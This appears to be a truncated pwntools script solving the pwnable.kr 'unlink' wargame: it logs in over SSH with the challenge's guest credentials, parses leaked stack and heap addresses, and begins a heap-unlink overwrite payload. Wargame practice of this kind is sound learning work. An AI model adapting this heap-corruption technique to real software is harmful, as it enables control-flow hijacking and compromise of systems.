from pwn import * s = ssh(user="unlink", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/unlink/unlink") p.recvuntil("leak: ") stkebp = int(p.recvline()[:-1], 16) + 0x14 print(hex(stkebp)) p.recvuntil("leak: ") heap_a = int(p.recvline()[:-1], 16) print(hex(heap_a)) p.recvline() ''' chunk a 활용 pay = p32(0x080484eb) + b'A'*0xc pay += p32(heap_a+0xc)+p32(stkebp-0x4) ..